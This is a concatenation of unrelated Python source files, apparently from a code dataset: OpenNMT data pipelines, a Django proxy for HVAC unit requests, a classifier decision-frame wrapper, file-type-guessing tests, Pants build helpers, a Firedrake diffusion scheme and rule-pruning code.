"""Transformation that applies most of the dataset operations commonly used
for training on sequence data:
* sharding
* shuffling
* processing
* filtering
* bucketization
* batching
* prefetching
Example:
>>> dataset = dataset.apply(opennmt.data.training_pipeline(...))
Args:
batch_size: The batch size to use.
batch_type: The training batching strategy to use: can be "examples" or
"tokens".
batch_multiplier: The batch size multiplier.
batch_size_multiple: When :obj:`batch_type` is "tokens", ensure that the
resulting batch size is a multiple of this value.
process_fn: The processing function to apply on each element.
transform_fns: List of dataset transformation functions (applied after
:obj:`process_fn` if defined).
length_bucket_width: The width of the length buckets to select batch
candidates from. ``None`` to not constrain batch formation.
features_length_fn: A function mapping features to a sequence length.
labels_length_fn: A function mapping labels to a sequence length.
maximum_features_length: The maximum length or list of maximum lengths of
the features sequence(s). ``None`` to not constrain the length.
maximum_labels_length: The maximum length of the labels sequence.
``None`` to not constrain the length.
single_pass: If ``True``, makes a single pass over the training data.
num_shards: The number of data shards (usually the number of workers in a
distributed setting).
shard_index: The shard index this data pipeline should read from.
num_threads: The number of elements processed in parallel.
dataset_size: If the dataset size is already known, it can be passed here to
avoid a slower generic computation of the dataset size later.
shuffle_buffer_size: The number of elements from which to sample.
prefetch_buffer_size: The number of batches to prefetch asynchronously. If
``None``, use an automatically tuned value.
cardinality_multiple: Ensure that the dataset cardinality is a multiple of
this value when :obj:`single_pass` is ``True``.
Returns:
A ``tf.data.Dataset`` transformation.
See Also:
- :func:`opennmt.data.batch_sequence_dataset`
- :func:`opennmt.data.make_cardinality_multiple_of`
- :func:`opennmt.data.filter_examples_by_length`
- :func:`opennmt.data.filter_irregular_batches`
- :func:`opennmt.data.shuffle_dataset`
"""
if dataset_size is not None and num_shards > 1:
# Update dataset_size based on the shard size.
if isinstance(dataset_size, list):
dataset_size = [size // num_shards for size in dataset_size]
else:
dataset_size //= num_shards
def _make_weighted_dataset(datasets, weights):
if single_pass:
raise ValueError(
"single_pass parameter is not compatible with weighted datasets"
)
if not datasets:
raise ValueError("At least one dataset is required")
if weights is not None and len(weights) != len(datasets):
raise ValueError(
"%d dataset weights were provided, but %d were expected to match the "
"number of data files" % (len(weights), len(datasets))
)
if num_shards > 1:
datasets = [dataset.shard(num_shards, shard_index) for dataset in datasets]
weights = normalize_weights(datasets, weights=weights, sizes=dataset_size)
datasets = [dataset.repeat() for dataset in datasets]
dataset = tf.data.experimental.sample_from_datasets(datasets, weights=weights)
if shuffle_buffer_size is not None and shuffle_buffer_size != 0:
if shuffle_buffer_size < 0:
raise ValueError(
"shuffle_buffer_size < 0 is not compatible with weighted datasets"
)
dataset = dataset.shuffle(shuffle_buffer_size)
return dataset
def _make_single_dataset(dataset):
if num_shards > 1:
dataset = dataset.shard(num_shards, shard_index)
if shuffle_buffer_size is not None and shuffle_buffer_size != 0:
dataset = dataset.apply(
shuffle_dataset(shuffle_buffer_size, dataset_size=dataset_size)
)
return dataset
def _pipeline(dataset):
if isinstance(dataset, tuple):
dataset, weights = dataset
else:
weights = None
is_weighted_dataset = isinstance(dataset, list)
if is_weighted_dataset:
dataset = _make_weighted_dataset(dataset, weights)
else:
dataset = _make_single_dataset(dataset)
if process_fn is not None:
dataset = dataset.map(process_fn, num_parallel_calls=num_threads or 4)
if transform_fns is not None:
for transform_fn in transform_fns:
dataset = dataset.apply(transform_fn)
dataset = dataset.apply(
filter_examples_by_length(
maximum_features_length=maximum_features_length,
maximum_labels_length=maximum_labels_length,
features_length_fn=features_length_fn,
labels_length_fn=labels_length_fn,
)
)
dataset = dataset.apply(
batch_sequence_dataset(
batch_size,
batch_type=batch_type,
batch_multiplier=batch_multiplier,
batch_size_multiple=batch_size_multiple,
length_bucket_width=length_bucket_width,
length_fn=[features_length_fn, labels_length_fn],
)
)
dataset = dataset.apply(filter_irregular_batches(batch_multiplier))
if not single_pass:
if not is_weighted_dataset: # Weighted dataset is repeated before sampling.
dataset = dataset.repeat()
else:
dataset = dataset.apply(make_cardinality_multiple_of(cardinality_multiple))
dataset = dataset.prefetch(prefetch_buffer_size)
return dataset
return _pipeline
def inference_pipeline(
batch_size,
batch_type="examples",
process_fn=None,
transform_fns=None,
length_bucket_width=None,
length_fn=None,
num_threads=None,
prefetch_buffer_size=None,
):
"""Transformation that applies dataset operations for inference.
Example:
>>> dataset = dataset.apply(opennmt.data.inference_pipeline(...))
Args:
batch_size: The batch size to use.
batch_type: The batching strategy to use: can be "examples" or "tokens".
process_fn: The processing function to apply on each element.
transform_fns: List of dataset transformation functions (applied after
:obj:`process_fn` if defined).
length_bucket_width: The width of the length buckets to select batch
candidates from. If set, this means the inference pipeline will be
reordered based on the examples length, the application is then
responsible to restore the predictions in order. An "index" key will be
inserted in the examples dictionary.
length_fn: A function mapping features to a sequence length.
num_threads: The number of elements processed in parallel.
prefetch_buffer_size: The number of batches to prefetch asynchronously. If
``None``, use an automatically tuned value.
Returns:
A ``tf.data.Dataset`` transformation.
Raises:
ValueError: if :obj:`length_bucket_width` is set but not :obj:`length_fn`.
ValueError: if :obj:`length_bucket_width` is set but the dataset does not
output a dictionary structure.
"""
def _inject_index(index, x):
if isinstance(x, tuple):
features = x[0]
else:
features = x
features["index"] = index
return x
def _pipeline(dataset):
if process_fn is not None:
dataset = dataset.map(process_fn, num_parallel_calls=num_threads)
if transform_fns is not None:
for transform_fn in transform_fns:
dataset = dataset.apply(transform_fn)
if length_bucket_width is not None and length_bucket_width > 0:
if length_fn is None:
raise ValueError("length_fn is required when reordering by length")
output_shapes = _get_output_shapes(dataset)
if isinstance(output_shapes, tuple):
num_length_fn = (
len(length_fn) if isinstance(length_fn, (list, tuple)) else 1
)
if len(output_shapes) != num_length_fn:
raise ValueError(
"The dataset outputs %d parallel features, but got %d "
"length functions" % (len(output_shapes), num_length_fn)
)
output_shapes = output_shapes[0]
if not isinstance(output_shapes, dict):
raise ValueError(
"Reordering by length expects dataset elements to be Python dicts"
)
dataset = dataset.enumerate()
dataset = dataset.map(_inject_index)
dataset = dataset.apply(
batch_sequence_dataset(
batch_size,
batch_type=batch_type,
length_bucket_width=length_bucket_width,
length_fn=length_fn,
)
)
else:
dataset = dataset.apply(batch_dataset(batch_size))
dataset = dataset.prefetch(prefetch_buffer_size)
return dataset
return _pipeline
| StarcoderdataPython |
1619296 | <reponame>jokajak/infinity_tracker
# import datetime
import logging
# from django.conf import settings
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from requests import Request, Session
# from defusedxml import ElementTree as ET
# Get an instance of a logger
logger = logging.getLogger(__name__)
def proxy_request(request):
headers = dict(request.headers)
full_uri = request.build_absolute_uri()
method = request.method
content_length = int(request.headers.get("Content-Length", 0) or 0)
# now = datetime.datetime.now().strftime("%Y%m%d_%H%M")
# if settings.get("SAVE_REQUESTS", False) and content_length > 0 and request.method == "POST":
# fname = "req_{uri}_{now}.xml".format(
# uri=request.resolver_match.func.__name__, now=now
# )
# req_file = "{media}/{fname}".format(media=settings.MEDIA_ROOT, fname=fname)
# with open(req_file, "w") as f:
# f.write(request.POST["data"])
logger.debug("{method}: {uri}".format(method=method, uri=full_uri))
headers["Content-Length"] = str(content_length)
s = Session()
req = Request(method, full_uri, headers=headers, data=request.body)
prepped = req.prepare()
r = s.send(prepped)
logger.debug("Response: {response}".format(response=r.content))
# if settings.get("SAVE_RESPONSES", False) and r.content:
# fname = "resp_{uri}_{now}.xml".format(
# uri=request.resolver_match.func.__name__, now=now
# )
# req_file = "{media}/{fname}".format(media=settings.MEDIA_ROOT, fname=fname)
# with open(req_file, "wb") as f:
# f.write(r.content)
return r
# Create your views here.
@csrf_exempt
def release_notes(request, uri=None):
"""Handle release note requests.
Release note requests come in with a different URI as the path so they
must be handled differently.
"""
logger.info("Received release_notes request")
headers = dict(request.headers)
full_uri = "http{uri}".format(uri=uri)
method = request.method
content_length = int(request.headers.get("Content-Length", 0) or 0)
logger.debug("{method}: {uri}".format(method=method, uri=full_uri))
headers["Content-Length"] = str(content_length)
s = Session()
req = Request(method, full_uri, headers=headers, data=request.body)
prepped = req.prepare()
r = s.send(prepped)
logger.debug("Response: {response}".format(response=r.content))
return r
@csrf_exempt
def default_handler(request, path=None):
"""Handle all other requests
This view handles all other request types
"""
logger.info("Unmanaged path: {path}".format(path=path))
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def alive(request):
"""Handle alive checks.
This view handles proxying alive checks performed by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_overview(request, serial):
"""Handle system posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_profile(request, serial):
"""Handle system profile posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_status(request, serial):
"""Handle system status posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_dealer(request, serial):
"""Handle system dealer posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_notifications(request, serial):
"""Handle system notifications posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_idu_config(request, serial):
"""Handle system In-Door Unit posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_odu_config(request, serial):
"""Handle system Out-Door Unit posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_equipment_events(request, serial):
"""Handle system equipment events posts
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
| StarcoderdataPython |
1609371 | """
polymerXtal
In this work, we present PolymerXtal, a software designed to build and analyze molecular-level polymer crystal structures. PolymerXtal provides a standardized process to generate polymer crystal structure based on monomer, tacticity, helicity, chiriality and unit cell information and analyze the crystallinity in polymer systems with given atom trajectories. These features have allowed PolymerXtal to lead further investigations of semi-crystalline polymers where the birthplace of the important physics in play and promote future research endeavors in the area of crystalline polymer simulations.
"""
import os
# Create tmp folder
if not os.path.exists(".tmp"):
os.mkdir(".tmp")
if not os.path.exists(".tmp/bonds"):
os.mkdir(".tmp/bonds")
if not os.path.exists(".tmp/types"):
os.mkdir(".tmp/types")
# Add imports here
from .data import sample_chain
from .crystal import Helice, Chain, Cell
# Handle versioneer
from ._version import get_versions
versions = get_versions()
__version__ = versions["version"]
__git_revision__ = versions["full-revisionid"]
del get_versions, versions
| StarcoderdataPython |
133421 | from __future__ import annotations
from typing import Sequence
from pathlib import Path
import numpy as np
import pandas as pd
from dscience.core.exceptions import *
from dscience.core.extended_df import *
from dscience.ml.confusion_matrix import *
from kale.ml.accuracy_frames import *
class DecisionFrame(OrganizingFrame):
"""
An n × m matrix of probabilities (or scores) from a classifier.
The n rows are samples, and the m columns are predictions. The values are the confidence or pobability of prediction.
The single index column is named 'correct_label', and the single column name is named 'label'.
Practically, this is a Pandas wrapper around a scikit-learn decision_function
that also has the predicted and correct class labels.
"""
@classmethod
def required_index_names(cls) -> Sequence[str]:
return ["label", "sample_id"]
@classmethod
def of(
cls,
correct_labels: Sequence[str],
labels: Sequence[str],
decision_function: np.array,
sample_ids: Sequence[Any],
) -> DecisionFrame:
"""
Wraps a decision function numpy array into a DecisionFrame instance complete with labels as names and columns.
:param correct_labels: A length-n list of the correct labels for each of the n samples
:param labels: A length-m list of class labels matching the predictions (columns) on `probabilities`
:param decision_function: An n × m matrix of probabilities (or scores) from the classifier.
The rows are samples, and the columns are predictions.
scikit-learn decision_functions (ex model.predict_proba) will output this.
:param sample_ids: IDs (or names) of training examples for later reference; should be unique
:return: A DecisionFrame
"""
decision_function = pd.DataFrame(decision_function)
decision_function.index = [correct_labels, sample_ids]
decision_function.columns = labels
decision_function.index.names = ["label", "sample_id"]
return cls.convert(decision_function)
def confusion(self) -> ConfusionMatrix:
labels = self.columns
correct_labels = self.index.get_level_values("label")
if self.shape[0] != len(correct_labels):
raise LengthMismatchError(
"Number of rows of decision function of shape {} is not the length of the correct labels {}".format(
self.shape, len(correct_labels)
)
)
if self.shape[1] != len(labels):
raise LengthMismatchError(
"Number of columns of decision function of shape {} is not the length of the class labels {}".format(
self.shape, len(labels)
)
)
correct_confused_with = {c: {p: 0.0 for p in labels} for c in labels}
for r, row in enumerate(self.index):
correct_name = correct_labels[r]
for c, column in enumerate(self.columns):
confused_name = labels[c]
correct_confused_with[correct_name][confused_name] += self.iat[r, c]
correct_confused_with = pd.DataFrame(correct_confused_with)
correct_confused_with /= correct_confused_with.sum()
return ConfusionMatrix(correct_confused_with)
def accuracy(self) -> AccuracyFrame:
actual_labels = self.index.get_level_values("label").values
sample_ids = self.index.get_level_values("sample_id").values
stripped = self.reset_index().drop("sample_id", axis=1).set_index("label")
predicted_labels = stripped.idxmax(axis=1).values
predicted_probs = stripped.max(axis=1).values
actual_probs = stripped.apply(lambda r: r.loc[r.name], axis=1).values
return AccuracyFrame(
{
"label": actual_labels,
"sample_id": sample_ids,
"prediction": predicted_labels,
"score": actual_probs * 100.0,
"score_for_prediction": predicted_probs * 100.0,
}
)
@classmethod
def read_csv(cls, path: PathLike, *args, **kwargs) -> DecisionFrame:
df = pd.read_csv(Path(path)).set_index(cls.required_index_names())
return cls(df)
def to_csv(self, path: PathLike, *args, **kwargs):
self.to_vanilla().to_csv(path, index_label=self.__class__.required_index_names())
__all__ = ["DecisionFrame"]
| StarcoderdataPython |
3317276 | <filename>tests/ftguess/test_basic.py
"""Test ftguess"""
import unittest
import os
from os.path import splitext
from oletools import ftguess
# Directory with test data, independent of current working directory
from tests.test_utils import DATA_BASE_DIR
from tests.test_utils.testdata_reader import loop_over_files
class TestFTGuess(unittest.TestCase):
"""Test ftguess"""
def test_all(self):
"""Run all files in test-data and compare to known ouput"""
# ftguess knows extension for each FType, create a reverse mapping
used_types = (
ftguess.FType_RTF, ftguess.FType_Generic_OLE,
ftguess.FType_Generic_Zip, ftguess.FType_Word97,
ftguess.FType_Word2007, ftguess.FType_Word2007_Macro,
ftguess.FType_Word2007_Template,
ftguess.FType_Word2007_Template_Macro, ftguess.FType_Excel97,
ftguess.FType_Excel2007,
ftguess.FType_Excel2007_XLSX , ftguess.FType_Excel2007_XLSM ,
ftguess.FType_Excel2007_Template,
ftguess.FType_Excel2007_Template_Macro,
ftguess.FType_Excel2007_Addin_Macro, ftguess.FType_Powerpoint97,
ftguess.FType_Powerpoint2007_Presentation,
ftguess.FType_Powerpoint2007_Slideshow,
ftguess.FType_Powerpoint2007_Macro,
ftguess.FType_Powerpoint2007_Slideshow_Macro,
ftguess.FType_XPS,
)
ftype_for_extension = dict()
for ftype in used_types:
for extension in ftype.extensions:
ftype_for_extension[extension] = ftype
# TODO: xlsb is not implemented yet
ftype_for_extension['xlsb'] = ftguess.FType_Generic_OpenXML
for filename, file_contents in loop_over_files():
# let the system guess
guess = ftguess.ftype_guess(data=file_contents)
#print(f'for debugging: {filename} --> {guess}')
# determine what we expect...
before_dot, extension = splitext(filename)
if extension == '.zip':
extension = splitext(before_dot)[1]
elif filename in ('basic/empty', 'basic/text'):
extension = '.csv' # have just like that
elif not extension:
self.fail('Could not find extension for test sample {0}'
.format(filename))
extension = extension[1:] # remove the leading '.'
# encrypted files are mostly recognized (yet?), except .xls
if filename.startswith('encrypted/'):
if extension == 'xls':
expect = ftguess.FType_Excel97
else:
expect = ftguess.FType_Generic_OLE
elif extension in ('xml', 'csv', 'odt', 'ods', 'odp', 'potx', 'potm'):
# not really an office file type
expect = ftguess.FType_Unknown
elif filename == 'basic/encrypted.docx':
expect = ftguess.FType_Generic_OLE
else:
# other files behave nicely, so extension determines the type
expect = ftype_for_extension[extension]
self.assertEqual(guess.container, expect.container,
msg='ftguess guessed container {0} for {1} '
'but we expected {2}'
.format(guess.container, filename,
expect.container))
self.assertEqual(guess.filetype, expect.filetype,
msg='ftguess guessed filetype {0} for {1} '
'but we expected {2}'
.format(guess.filetype, filename,
expect.filetype))
self.assertEqual(guess.application, expect.application,
msg='ftguess guessed application {0} for {1} '
'but we expected {2}'
.format(guess.application, filename,
expect.application))
if expect not in (ftguess.FType_Generic_OLE, ftguess.FType_Unknown):
self.assertEqual(guess.is_excel(), extension.startswith('x')
and extension != 'xml'
and extension != 'xlsb'
and extension != 'xps')
# xlsb is excel but not handled properly yet
self.assertEqual(guess.is_word(), extension.startswith('d'))
self.assertEqual(guess.is_powerpoint(),
extension.startswith('p'))
# just in case somebody calls this file as a script
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
3399473 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from abc import abstractmethod
from pants.base.build_file_target_factory import BuildFileTargetFactory
from pants.build_graph.address import BuildFileAddress
from pants.util.meta import AbstractClass
class AddressableCallProxy(BuildFileTargetFactory):
"""A registration proxy for objects to be captured and addressed from BUILD files."""
def __init__(self, addressable_factory, build_file, registration_callback):
self._addressable_factory = addressable_factory
self._build_file = build_file
self._registration_callback = registration_callback
@property
def target_types(self):
return self._addressable_factory.target_types
def __call__(self, *args, **kwargs):
addressable = self._addressable_factory.capture(*args, **kwargs)
addressable_name = addressable.addressed_name
if addressable_name:
address = BuildFileAddress(build_file=self._build_file, target_name=addressable_name)
self._registration_callback(address, addressable)
return addressable
def __repr__(self):
return ('AddressableCallProxy(addressable_factory={}, build_file={})'
.format(self._addressable_factory, self._build_file))
class Addressable(AbstractClass):
"""An ABC for classes which would like instances to be named and exported from BUILD files."""
class Factory(BuildFileTargetFactory):
"""Captures addressable instances from BUILD file calls."""
@abstractmethod
def capture(self, *args, **kwargs):
"""Captures the arguments passed to an addressable alias in a BUILD file.
:returns: An addressable instance representing the call capture.
:rtype: :class:`Addressable`
"""
def __str__(self):
return '{}(target_types={})'.format(type(self).__name__, self.target_types)
class AddressableInitError(Exception):
"""Indicates a problem capturing arguments to create a new :class:`Addressable`."""
def __init__(self, addressed_alias, addressed_type):
self._addressed_alias = addressed_alias
self._addressed_type = addressed_type
@property
def addressed_alias(self):
"""The alias via which this addressable was invoked.
:rtype: string
"""
return self._addressed_alias
@property
def addressed_type(self):
"""The type this addressable captures calls to and ultimately can `instantiate`.
:returns: The class of the addressed type this addressable proxies for.
:rtype: type
"""
return self._addressed_type
@property
def addressed_name(self):
"""This property is inspected by AddressableCallProxy to automatically name Addressables.
Generally, a subclass will inspect its captured arguments and return, for example, the
captured `name` parameter. A value of `None` (the default) causes AddressableCallProxy
to skip capturing and naming this instance.
"""
return None
def instantiate(self, *args, **kwargs):
"""Realizes the captured addressable call as an instance of the aliased object type.
:returns: A fully hydrated addressable object.
"""
return self.addressed_type(*args, **kwargs)
| StarcoderdataPython |
4839587 | """Top-level package for LensLikelihood."""
__author__ = """<NAME>"""
__email__ = '<EMAIL>'
__version__ = '0.1.0'
| StarcoderdataPython |
3361889 | <filename>djenga/core/__init__.py<gh_stars>1-10
from .bunch import Bunch
from .env import * # noqa
| StarcoderdataPython |
4824805 | <filename>gusto/diffusion.py
from abc import ABCMeta, abstractmethod
from firedrake import (TestFunction, TrialFunction, Function,
inner, outer, grad, avg, dx, dS_h, dS_v,
FacetNormal, LinearVariationalProblem,
LinearVariationalSolver, action)
__all__ = ["InteriorPenalty"]
class Diffusion(object, metaclass=ABCMeta):
"""
Base class for diffusion schemes for gusto.
:arg state: :class:`.State` object.
"""
def __init__(self, state):
self.state = state
@abstractmethod
def apply(self, x, x_out):
"""
Function takes x as input, computes F(x) and returns x_out
as output.
:arg x: :class:`.Function` object, the input Function.
:arg x_out: :class:`.Function` object, the output Function.
"""
pass
class InteriorPenalty(Diffusion):
"""
Interior penalty diffusion method
:arg state: :class:`.State` object.
:arg V: Function space of diffused field
:arg direction: list containing directions in which function space
:arg: mu: the penalty weighting function, which is
:recommended to be proportional to 1/dx
:arg: kappa: strength of diffusion
:arg: bcs: (optional) a list of boundary conditions to apply
"""
def __init__(self, state, V, kappa, mu, bcs=None):
super(InteriorPenalty, self).__init__(state)
dt = state.timestepping.dt
gamma = TestFunction(V)
phi = TrialFunction(V)
self.phi1 = Function(V)
n = FacetNormal(state.mesh)
a = inner(gamma, phi)*dx + dt*inner(grad(gamma), grad(phi)*kappa)*dx
def get_flux_form(dS, M):
fluxes = (-inner(2*avg(outer(phi, n)), avg(grad(gamma)*M))
- inner(avg(grad(phi)*M), 2*avg(outer(gamma, n)))
+ mu*inner(2*avg(outer(phi, n)), 2*avg(outer(gamma, n)*kappa)))*dS
return fluxes
a += dt*get_flux_form(dS_v, kappa)
a += dt*get_flux_form(dS_h, kappa)
L = inner(gamma, phi)*dx
problem = LinearVariationalProblem(a, action(L, self.phi1), self.phi1, bcs=bcs)
self.solver = LinearVariationalSolver(problem)
def apply(self, x_in, x_out):
self.phi1.assign(x_in)
self.solver.solve()
x_out.assign(self.phi1)
| StarcoderdataPython |
3267854 | # Performs post-pruning of a rule set by deleting rules that don't improve the training accuracy
from . import simplification as s
from . import evaluation_formulas as ef
from operator import concat
import time
import math
import itertools
import heapq
def post_prune(dnf, class_condition, condition_example_dict, example_indexes, data = None):
'''
Applies boolean simplification and post-pruning
param dnf: list of lists emulating a DNF expression
param class_condition: condition which that DNF classifies for
param condition_example_dict: evaluation of conditions in the network
param example_indexes: training examples
'''
if len(dnf) > 1:
dnf = delete_non_ocurring_rules(dnf, class_condition, condition_example_dict, example_indexes)
for r in dnf:
r.sort()
dnf, positives, negatives, tp, fp = _build_pos_neg_tp_fp(dnf, class_condition, condition_example_dict, example_indexes)
#start = time.time()
dnf = prune_rules(dnf, class_condition, condition_example_dict, example_indexes, positives, negatives, tp, fp)
print('\nRules that do not increase accuracy are pruned')
#end = time.time()
print('F number rules:',len(dnf))
print('F number terms:',sum(len(r) for r in dnf))
if data:
print('Fidelity:', ef.accuracy_of_dnf(data, class_condition, dnf, True, False, False, True))
#print('TIME: ', end-start)
if len(dnf) > 1:
dnf = s.boolean_simplify_complex(dnf)
print('\nBasic boolean simplification')
#end = time.time()
print('F number rules:',len(dnf))
print('F number terms:',sum(len(r) for r in dnf))
if data:
print('Fidelity:', ef.accuracy_of_dnf(data, class_condition, dnf, True, False, False, True))
#print('TIME: ', end-start)
return dnf
def delete_non_ocurring_rules(dnf, class_condition, condition_example_dict, example_indexes):
positives = [e for e in example_indexes if _fulfills_condition(e, condition_example_dict, class_condition)]
n_rules = len(dnf)
return [dnf[r] for r in range(n_rules) if any(_fulfills_rule(e, condition_example_dict, dnf[r]) for e in positives)]
def _create_merged_rule(rule_1, rule_2):
""" Finds a rule which is the least general rule that is more general than
both argument rules.
"""
neurons = set((l, n) for (l, n, t, b) in rule_1).intersection((l, n) for (l, n, t, b) in rule_1)
new_rule = []
for (l_i, n_i) in neurons:
bigger_t_1 = [t for (l, n, t, b) in rule_1 if (l, n) == (l_i, n_i) and b]
smaller_t_1 = [t for (l, n, t, b) in rule_1 if (l, n) == (l_i, n_i) and not b]
bigger_t_2 = [t for (l, n, t, b) in rule_2 if (l, n) == (l_i, n_i) and b]
smaller_t_2 = [t for (l, n, t, b) in rule_2 if (l, n) == (l_i, n_i) and not b]
if bigger_t_1 and bigger_t_2:
min_t = min(bigger_t_1 + bigger_t_2)
new_rule.append((l_i, n_i, min_t, True))
if smaller_t_1 and smaller_t_2:
max_t = max(smaller_t_1 + smaller_t_2)
new_rule.append((l_i, n_i, max_t, False))
return new_rule
def _fulfills_condition(example_index, condition_example_dict, cond):
if cond[3]:
if example_index in condition_example_dict[(cond[0], cond[1], cond[2])]:
return True
else:
return False
else:
if example_index not in condition_example_dict[(cond[0], cond[1], cond[2])]:
return True
else:
return False
def _fulfills_rule(example_index, condition_example_dict, rule):
if all(_fulfills_condition(example_index, condition_example_dict, c) for c in rule):
return True
else:
return False
def _build_pos_neg_tp_fp(dnf, class_condition, condition_example_dict, example_indexes, positives=None, negatives=None):
if not positives:
positives = [e for e in example_indexes if _fulfills_condition(e, condition_example_dict, class_condition)]
if not negatives:
negatives = [e for e in example_indexes if not _fulfills_condition(e, condition_example_dict, class_condition)]
tp = []
fp = []
remaining_rules = []
for r in range(len(dnf)):
tp_r = [e for e in positives if _fulfills_rule(e, condition_example_dict, dnf[r])]
fp_r = [e for e in negatives if _fulfills_rule(e, condition_example_dict, dnf[r])]
if len(fp_r) < len(tp_r):
tp.append(tp_r)
fp.append(fp_r)
remaining_rules.append(r)
dnf = [dnf[r] for r in remaining_rules]
return dnf, positives, negatives, tp, fp
def prune_rules(dnf, class_condition, condition_example_dict, example_indexes, positives, negatives, tp, fp):
'''
The rules are ordered according to their increasing certainty factor. Starting from the first rule,
the change of fidelity of deleting it, merging it with any other rule or of eliminating any of its conditions is calculated.
The change that brings the best improvement is considered. If this improvement is cero or more, the change is made,
the fidelity is updated and the modified rule is inserted into the heap of remaining rules. The other side of the
rule remains in the heap, but would probably be deleted at the end.
'''
n_rules = len(dnf)
# This stores the indexes of the rules that will be kept at the end
remaining_rules = list(range(n_rules)) #ADDED list(...) range is no list in Python3
# This stores the indexes of the rules that are yet to be seen. They are ordered in terms of increasing certainty factor.
rules_to_explore = []
for r in range(n_rules):
try:
certainty_factor = float(len(tp[r]))/(len(tp[r]) + len(fp[r]))
except ZeroDivisionError:
certainty_factor = 0
heapq.heappush(rules_to_explore, (certainty_factor, r))
tp_count = sum(1 for e in positives if any(e in tp[i] for i in remaining_rules))
tn_count = sum(1 for e in negatives if not any(e in fp[i] for i in remaining_rules))
last_accuracy = float(tp_count+tn_count)/len(example_indexes)
print('last_accuracy', last_accuracy)
while rules_to_explore:
print('rules_to_explore', rules_to_explore)
print('Size of heap:', len(rules_to_explore))
cf, j = heapq.heappop(rules_to_explore)
print('j', j)
#print(dnf[j])
# Positive and negative examples that are classified by the rest of the rules
tp_others = [e for e in positives if any(e in tp[i] for i in remaining_rules if i != j)]
fp_others = [e for e in negatives if any(e in fp[i] for i in remaining_rules if i != j)]
# Positive and negative examples that are not classified by any of the other rules
left_tp = [e for e in positives if e not in tp_others]
left_fp = [e for e in negatives if e not in fp_others]
# Positive and negative examples that are only classified by the rule
tp_rule = [e for e in tp[j] if e not in tp_others]
fp_rule = [e for e in fp[j] if e not in fp_others]
rule_variants = []
# If each of its conditions is deleted
for cond_i in range(len(dnf[j])):
new_rule = dnf[j][:]
del new_rule[cond_i]
additional_tp = [e for e in left_tp if _fulfills_rule(e, condition_example_dict, new_rule)]
additional_fp = [e for e in left_fp if _fulfills_rule(e, condition_example_dict, new_rule)]
accuracy = float(len(tp_others)+len(additional_tp)+len(left_fp)-len(additional_fp))/len(example_indexes)
new_rule.sort()
heapq.heappush(rule_variants, (-accuracy, new_rule))
# Possible merging with any other rule
for other in remaining_rules:
if other != j:
new_rule = _create_merged_rule(dnf[j], dnf[other])
new_rule.sort()
if new_rule != sorted(dnf[j]) and new_rule != sorted(dnf[other]):
additional_tp = [e for e in left_tp if _fulfills_rule(e, condition_example_dict, new_rule)]
additional_fp = [e for e in left_fp if _fulfills_rule(e, condition_example_dict, new_rule)]
accuracy = float(len(tp_others)+len(additional_tp)+len(left_fp)-len(additional_fp))/len(example_indexes)
heapq.heappush(rule_variants, (-accuracy, new_rule))
# If the rule is deleted
accuracy = float(len(tp_others)+len(left_fp))/len(example_indexes)
heapq.heappush(rule_variants, (-accuracy, []))
# Get the change that leads to the smallest decrease in accuracy
accuracy, chosen_rule = heapq.heappop(rule_variants)
if -accuracy > last_accuracy:
last_accuracy = -accuracy
print('last_accuracy', last_accuracy)
# The rule is deleted
remaining_rules.remove(j)
# If the chosen rule is not the empty rule, it is added to the heap, and it is added to the dnf at the end.
# Also, its true positive and true negative examples are added to the respective arrays
print('new rule', chosen_rule)
if len(chosen_rule)>0:
tp_new = [e for e in positives if _fulfills_rule(e, condition_example_dict, chosen_rule)]
fp_new = [e for e in negatives if _fulfills_rule(e, condition_example_dict, chosen_rule)]
tp.append(tp_new)
fp.append(fp_new)
dnf.append(chosen_rule)
remaining_rules.append(n_rules)
try:
certainty_factor = float(len(tp_new))/(len(tp_new) + len(fp_new))
except ZeroDivisionError:
certainty_factor = 0
heapq.heappush(rules_to_explore, (certainty_factor, n_rules))
n_rules += 1
else:
print('rule deleted')
return [dnf[r] for r in remaining_rules]
| StarcoderdataPython |
3279251 | <reponame>tehw0lf/pybel<filename>src/pybel/struct/mutation/deletion/__init__.py
# -*- coding: utf-8 -*-
"""Modules supporting deletion and degradation of graphs."""
from . import protein_rna_origins, deletion
from .protein_rna_origins import *
from .deletion import *
__all__ = (
protein_rna_origins.__all__ +
deletion.__all__
)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.